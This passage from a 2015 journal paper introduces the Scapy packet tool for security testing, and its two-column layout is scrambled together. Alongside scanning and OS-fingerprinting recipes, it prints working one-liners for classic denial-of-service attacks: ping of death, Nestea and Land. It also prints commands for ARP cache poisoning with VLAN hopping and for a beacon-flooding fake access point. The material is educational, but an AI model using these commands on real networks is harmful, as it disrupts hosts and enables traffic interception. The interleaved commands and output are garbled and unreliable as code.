Gnuplot. TCP traceroute (2) 15 193.45.10.88 SA 216.109.120.149 64.124.229.109 66.94.229.254 SA Scapy also has a powerful TCP traceroute function. Unlike other 16 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA traceroute programs that wait for each node to reply before going 66.94.229.254 SA to the next, scapy sends all the packets at the same time. This has 17 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA the disadvantage that it can’t know when to stop (thus the maxttl 66.94.229.254 SA parameter) but the great advantage that it took less than 3 seconds to get this multi-target traceroute result: 18 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA >>> traceroute([“www.yahoo.com”,”www.altavista.com”,”www. wisenut.com”,”www.copernic.com”],maxttl=20) 19 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA Received 80 packets, got 80 answers, remaining 0 packets 20 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 193.45.10.88:80 216.109.118.79:80 64.241.242.243:80 66.94.229.254 SA 66.94.229.254:80 ( J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 153 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 >>> r2,unans=traceroute([“www.voila.com”],maxttl=20) 10 193.252.227.245 212.23.37.13 SA 213.206.128.160 64.125.29.122 193.251.254.126 Received 19 packets, got 19 answers, remaining 1 packets 11 - 212.23.37.13 SA 206.24.169.41 64.125.28.70 216.115.97.178 195.101.94.25:80 12 195.101.94.25 SA 212.23.37.13 SA 206.24.226.100 64.125.28.209 1 192.168.8.1 216.115.101.46 2 82.251.4.254 13 195.101.94.25 SA 212.23.37.13 SA 206.24.238.166 64.125.29.45 3 213.228.4.254 66.218.82.234 4 212.27.50.169 14 195.101.94.25 SA 212.23.37.13 SA 216.109.74.30 64.125.31.214 66.94.229.254 SA 5 212.27.50.162 15 195.101.94.25 SA 212.23.37.13 SA 216.109.120.151 6 193.252.161.97 64.124.229.109 66.94.229.254 SA 7 193.252.103.86 16 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 8 193.252.103.77 64.241.242.243 SA 66.94.229.254 SA 9 193.252.101.1 17 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA 10 193.252.227.245 18 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 12 195.101.94.25 SA 64.241.242.243 SA 66.94.229.254 SA 13 195.101.94.25 SA 19 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 14 195.101.94.25 SA 64.241.242.243 SA 66.94.229.254 SA 15 195.101.94.25 SA 20 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA 16 195.101.94.25 SA Traceroute result object also have a very neat feature: they can 17 195.101.94.25 SA make a directed graph from all the routes they got, and cluster them 18 195.101.94.25 SA by AS. You will need graph viz. By default, ImageMagick is used to display the graph. 19 195.101.94.25 SA >>> res,unans = traceroute([“www.microsoft.com”,”www.cisco. 20 195.101.94.25 SA com”,”www.yahoo.com”,”www.wanadoo.fr”,”www.pacsec.com”],dpor >>> t=[80,443],maxttl=20,retry=-2) >>> r3=result+r2 Received 190 packets, got 190 answers, remaining 10 packets >>> r3.show() 193.252.122.103:443 193.252.122.103:80 198.133.219.25:443 198.133.219.25:80 207.46... 195.101.94.25:80 212.23.37.13:80 216.109.118.72:80 64.241.242.243:80 66.94.229.254:80 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.16... 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 82.251... 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 82.251.4.254 213.22... 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 [...] 213.228.4.254 >>> res.graph() # piped to ImageMagick’s display program. 4 212.27.50.169 212.27.50.169 212.27.50.46 - 212.27.50.46 Image below. 5 212.27.50.162 212.27.50.162 212.27.50.37 212.27.50.41 >>> res.graph(type=”ps”,target=”| lp”) # piped to postscript 212.27.50.37 printer 6 193.252.161.97 194.68.129.168 212.27.50.34 213.228.3.234 >>> res.graph(target=”> /tmp/graph.svg”) # saved to file 193.251.251.69 If you have VPython installed, you also can have a 3D representa- 7 193.252.103.86 212.23.42.33 217.118.239.185 208.184.231.214 tion of the traceroute. With the right button, you can rotate the scene, 193.251.241.178 with the middle button, you can zoom, with the left button, you can 8 193.252.103.77 212.23.42.6 217.118.224.44 64.125.31.129 move the scene. If you click on a ball, it’s IP will appear/disappear. If 193.251.242.98 you Ctrl-click on a ball, ports 21, 22, 23, 25, 80 and 443 will be scanned and the result displayed: 9 193.252.101.1 212.23.37.13 SA 213.206.129.85 64.125.31.186 193.251.243.89 >>> res.trace3D() J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 154 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 Wireless frame injection >>> ans.summary(lambda (s,r): r.sprintf(“%Ether.src% %ARP. psrc%”) ) Provided that your wireless card and driver are correctly config- ured for frame injection Scapy also includes a built-in arping() function which performs similar to the above two commands: $ ifconfig wlan0 up >>> arping(“192.168.1.*”) $ iwpriv wlan0 hostapd 1 ICMP ping $ ifconfig wlan0ap up Classical ICMP Ping can be emulated using the following you can have a kind of FakeAP: command: >>> sendp(Dot11(addr1=”ff:ff:ff:ff:ff:ff”,addr2=RandMAC(),addr3 >>> ans,unans=sr(IP(dst=”192.168.1.1-254”)/ICMP()) =RandMAC())/ Information on live hosts can be collected with the following Dot11Beacon(cap=”ESS”)/ request: Dot11Elt(ID=”SSID”,info=RandString(RandNum(1,50)))/ >>> ans.summary(lambda (s,r): r.sprintf(“%IP.src% is alive”) ) Dot11Elt(ID=”Rates”,info=’\x82\x84\x0b\x16’)/ TCP ping Dot11Elt(ID=”DSset”,info=”\x03”)/ In cases where ICMP echo requests are blocked, we can still use Dot11Elt(ID=”TIM”,info=”\x00\x01\x00\ various TCP Pings such as TCP SYN Ping below: x00”),iface=”wlan0ap”,loop=1) >>> ans,unans=sr( IP(dst=”192.168.1.*”)/TCP(dport=80,flags=”S”) ) Simple One-Liners Any response to our probes will indicate a live host. We can collect ACK scan results with the following command: Using Scapy’s powerful packet crafting facilities we can quick rep- >>> ans.summary( lambda(s,r) : r.sprintf(“%IP.src% is alive”) ) licate classic TCP Scans. For example, the following string will be sent UDP ping to simulate an ACK Scan: If all else fails there is always UDP Ping which will produce ICMP >>> ans,unans = sr(IP(dst=”www.slashdot.org”)/ Port unreachable errors from live hosts. Here you can pick any port TCP(dport=[80,666],flags=”A”)) which is most likely to be closed, such as port 0: We can find unfiltered ports in answered packets: >>> ans,unans=sr( IP(dst=”192.168.*.1-10”)/UDP(dport=0) ) >>> for s,r in ans: Once again, results can be collected with this command: ... if s[TCP].dport == r[TCP].sport: >>> ans.summary( lambda(s,r) : r.sprintf(“%IP.src% is alive”) ) ... print str(s[TCP].dport) + “ is unfiltered” Classical attacks Similarly, filtered ports can be found with unanswered packets: Malformed packets: >>> for s in unans: >>> send(IP(dst=”10.1.1.5”, ihl=2, version=3)/ICMP()) ... print str(s[TCP].dport) + “ is filtered” Ping of death (Muuahahah): Xmas scan >>> send( fragment(IP(dst=”10.0.0.5”)/ICMP()/(“X”*60000)) ) Xmas Scan can be launced using the following command: Nestea attack: >>> ans,unans=sr(IP(dst=”192.168.1.1”)/TCP(dport=666,flags=”FPU”)) >>> send(IP(dst=target, id=42, flags=”MF”)/UDP()/(“X”*10)) Checking RST responses will reveal closed ports on the target. >>> send(IP(dst=target, id=42, frag=48)/(“X”*116)) IP scan >>> send(IP(dst=target, id=42, flags=”MF”)/UDP()/(“X”*224)) A lower level IP Scan can be used to enumerate supported protocols: Land attack (designed for Microsoft Windows): >>> ans,unans=sr(IP(dst=”192.168.1.1”,proto=(0,255))/”SCAPY”,retry=2) >>> send(IP(src=target,dst=target)/TCP(sport=135,dport=135)) ARP ping ARP cache poisoning The fastest way to discover hosts on a local ethernet network is to This attack prevents a client from joining the gateway by poisoning use the ARP Ping method: its ARP cache through a VLAN hopping attack. >>> ans,unans=srp(Ether(dst=”ff:ff:ff:ff:ff:ff”)/ARP(pdst=”192.168 Classic ARP cache poisoning: .1.0/24”),timeout=2) >>> send (Ether(dst=clientMAC)/ARP(op=”who-has”, Answers can be reviewed with the following command: psrc=gateway, pdst=client), J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 155 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 inter=RandNum(10,40), loop=1 ) We can visualize the results as a list of routers: ARP cache poisoning with double 802.1q encapsulation: >>> res.make_table(lambda (s,r): (s.dst, s.ttl, r.src)) >>> send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) DNS traceroute /ARP(op=”who-has”, psrc=gateway, pdst=client), We can perform a DNS trace route by specifying a complete packet inter=RandNum(10,40), loop=1 ) in l4 parameter of traceroute() function: TCP port scanning >>> ans,unans=traceroute(“4.2.2.1”,l4=UDP(sport=RandShort())/ DNS(qd=DNSQR(qname=”thesprawl.org”))) Send a TCP SYN on each port. Wait for a SYN-ACK or a RST or an ICMP error: Begin emission: >>> res,unans = sr( IP(dst=”target”) ..*....******...******.***...****Finished to send 30 packets. /TCP(flags=”S”, dport=(1,1024)) ) *****...***...... Possible result visualization: open ports Received 75 packets, got 28 answers, remaining 2 packets >>> res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and 4.2.2.1:udp53 (r.getlayer(TCP).flags & 2)) ) 1 192.168.1.1 11 IKE scanning 4 68.86.90.162 11 We try to identify VPN concentrators by sending ISAKMP Security 5 4.79.43.134 11 Association proposals and receiving the answers: 6 4.79.43.133 11 >>> res,unans = sr( IP(dst=”192.168.1.*”)/UDP() 7 4.68.18.62 11 /ISAKMP(init_cookie=RandString(8), exch_type=”identity prot.”) 8 4.68.123.6 11 /ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()) 9 4.2.2.1 ) ... Visualizing the results in a list: Ether Leaking >>> res.nsummary(prn=lambda (s,r): r.src, lfilter=lambda (s,r): r.haslayer(ISAKMP) ) >>> sr1(IP(dst=”172.16.1.232”)/ICMP()) Advanced Traceroute J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 156 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 tDot11Beacon.cap%}”)) DHCP ==> Ether / IP / UDP 192.168.1.11:bootps > 255.255.255.255:bootpc / BOOTP / DHCP The above command will produce output similar to the one below: }}} 00:00:00:01:02:03 netgear 6L ESS+privacy+PBCC We are only interested in the MAC and IP addresses of the replies: 11:22:33:44:55:66 wireless_100 6L short-slot+ESS+privacy {{{ 44:55:66:00:11:22 linksys 6L short-slot+ESS+privacy >>> for p in ans: print p[1][Ether].src, p[1][IP].src 12:34:56:78:90:12 NETGEAR 6L short-slot+ESS+privacy+short- preamble ... Recipes 00:de:ad:be:ef:00 192.168.1.1 Simplistic ARP Monitor 00:11:11:22:22:33 192.168.1.11 This program uses the sniff() callback (paramter prn). The store Discussion parameter is set to 0 so that the sniff() function will not store anything We specify multi=True to make Scapy wait for more answer (as it would do otherwise) and thus can run forever. The filter parameter packets after the first response is received. This is also the reason why is used for better performances on high load: the filter is applied inside we can’t use the more convenient dhcp_request() function and have to the kernel and Scapy will only see ARP traffic. construct the DCHP packet manually: dhcp_request() uses srp1() for #! /usr/bin/env python sending and receiving and thus would immediately return after the first answer packet. from scapy.all import * Moreover, Scapy normally makes sure that replies come from the def arp_monitor_callback(pkt): same IP address the stimulus was sent to. But our DHCP packet is sent if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at to the IP broadcast address (255.255.255.255) and any answer packet will have the IP address of the replying DHCP server as its source IP return pkt.sprintf(“%ARP.hwsrc% %ARP.psrc%”) address (e.g. 192.168.1.1). Because these IP addresses don’t match, we sniff(prn=arp_monitor_callback, filter=”arp”, store=0) have to disable Scapy’s check with conf.checkIPaddr = False before sending the stimulus. Identifying rogue DHCP servers on your LAN See also Problem: You suspect that someone has installed an additional, unauthorized DHCP server on your LAN- either unintentiously or http://en.wikipedia.org/wiki/Rogue_DHCP maliciously. Thus you want to check for any active DHCP servers and Fire walking identify their IP and MAC addresses. TTL decrementation after a filtering operation only not filtered Solution: Use Scapy to send a DHCP discover request and analyze packets generate an ICMP TTL exceeded the replies: >>> ans, unans = sr(IP(dst=”172.16.4.27”, ttl=16)/TCP(dport=(1,1024))) >>> conf.checkIPaddr = False >>> for s,r in ans: >>> fam,hw = get_if_raw_hwaddr(conf.iface) if r.haslayer(ICMP) and r.payload.type == 11: >>> dhcp_discover = Ether(dst=”ff:ff:ff:ff:ff:ff”)/IP(src=”0.0.0.0”,d st=”255.255.255.255”)/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/ print s.dport DHCP(options=[(“message-type”,”discover”),”end”]) Find subnets on a multi-NIC firewall only his own NIC’s IP are >>> ans, unans = srp(dhcp_discover, multi=True) # Press reachable with this TTL: CTRL-C after several seconds >>> ans, unans = sr(IP(dst=”172.16.5/24”, ttl=15)/TCP()) Begin emission: >>> for i in unans: print i.dst Finished to send 1 packets. TCP timestamp filtering .*...*.. Problem: Many firewalls include a rule to drop TCP packets that Received 8 packets, got 2 answers, remaining 0 packets do not have TCP Timestamp option set which is a common occurrence In this case we got 2 replies, so there were two active DHCP servers in popular port scanners. on the test network: Solution: To allow Scapy to reach target destination additional >>> ans.summarize() options must be used: Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / >>> sr1(IP(dst=”72.14.207.99”)/TCP(dport=80,flags=”S”,options= DHCP ==> Ether / IP / UDP 192.168.1.1:bootps > 255.255.255.255:bootpc [(‘Timestamp’,(0,0))])) / BOOTP / DHCP Viewing packets with wireshark Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / Problem: You have generated or sniffed some packets with Scapy J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 157 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 and want to view them with Wireshark, because of its advanced packet Then you can use the nmap_fp() function which implements same dissection abilities. probes as in Nmap’s OS Detection engine: Solution: That’s what the wireshark() function is for: >>> nmap_fp(“192.168.1.1”,oport=443,cport=1) >>> packets = Ether()/IP(dst=Net(“google.com/30”))/ICMP() # Begin emission: first generate some packets .****..**Finished to send 8 packets. >>> wireshark(packets) # show them with Wireshark *...... Wireshark will start in the background and show your packets. Received 58 packets, got 7 answers, remaining 1 packets Discussion: The wireshark() function generates a temporary pcap- (1.0, [‘Linux 2.4.0 - 2.5.20’, ‘Linux 2.4.19 w/grsecurity patch’, file containing your packets, starts Wireshark in the background and makes it read the file on startup. ‘Linux 2.4.20 - 2.4.22 w/grsecurity.org patch’, ‘Linux 2.4.22-ck2 (x86) Please remember that Wireshark works with Layer 2 packets w/grsecurity.org and HZ=1000 patches’, ‘Linux 2.4.7 - 2.6.11’]) (usually called “frames”). So we had to add an Ether() header to our ICMP packets. Passing just IP packets (layer 3) to Wireshark will give p0f strange results. If you have p0f installed on your system, you can use it to guess OS You can tell Scapy where to find the Wireshark executable by name and version right from Scapy (only SYN database is used). First changing the conf.prog.wireshark configuration setting. make sure that p0f database exists in the path specified by: >>> conf.p0f_base OS Fingerprinting For example to guess OS from a single captured packet: ISN >>> sniff(prn=prnp0f) Scapy can be used to analyze ISN (Initial Sequence Number) increments to possibly discover vulnerable systems. First we will collect 192.168.1.100:54716 - Linux 2.6 (newer, 1) (up: 24 hrs) target responses by sending a number of SYN probes in a loop: -> 74.125.19.104:www (distance 0) >>> ans,unans=srloop(IP(dst=”192.168.1.1”)/TCP(dport=80, >>> for s,r in ans: at run time [10]. So there is no need to recompilation of every single change in source code. Everything is fast, quick and responsive. So ... temp = r[TCP].seq - temp security is essential in Python language. So we conclude that Scapy is packet sniffing tool for packet and this research paper is an introductory ... print str(r[TCP].seq) + “\t+” + str(temp) paper which gives a brief introduction about scapy, examples and some ... commands with the help of examples. 4278709328 +4275758673 Future Work 4279655607 +3896934 Scapy is a powerful tool. One can use this above explained 4280642461 +4276745527 commands in its application for packet sniffing, unit testing, functional testing, System testing, encoding, decoding etc. One can Skype also for 4281648240 +4902713 security management in linux/Unix operating Systems. In future one 4282645099 +4277742386 can expand Scapy to include features of Synchronization with Security while sending a packet from sender to receiver. 4283643696 +5901310 References nmap_fp 1. Lyu MR (1996) Handbook of Software Reliability Engineering: McGraw-Hill and IEEE Computer Society Press. Nmap fingerprinting (the old “1st generation” one that was done by Nmap up to v4.20) is supported in Scapy. In Scapy v2 you have to 2. Michael CC, Radosevich W, Ken van W (2005) Risk-Based and Functional Security Testing. Build Security in setting a higher standard for software load an extension module first: assurance. >>> load_module(“nmap”) 3. Ronald Ross (2011) Managing Information Security Risk: Organization, Mission and Information System View. NIST 800-839. If you have Nmap installed you can use it’s active os fingerprinting database with Scapy. Make sure that version 1 of signature database is 4. Biondi P (2002) Scapy. located in the path specified by: 5. Ofir Arkin, Josh Anderson (2003) Etherleak: Ethernet frame padding information leakage. >>> conf.nmap_base 6. Biondi P (2002) Linux Netfilter NAT/ICMP code information leak. J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 158 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 7. Biondi P (2003) Linux 2.0 remote info leak from too big icmp citation. 9. Dwivedi H, Clark C, Thiel D (2010) Mobile Application Security. McGraw-Hill 384. 8. Gift Noah, Jones Jeremy M (2008) Python for Unix and Linux System Administration. O’Reilly Media. 173-176. 10. Learning Python by O’Reilly and Mark Lutz. J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 159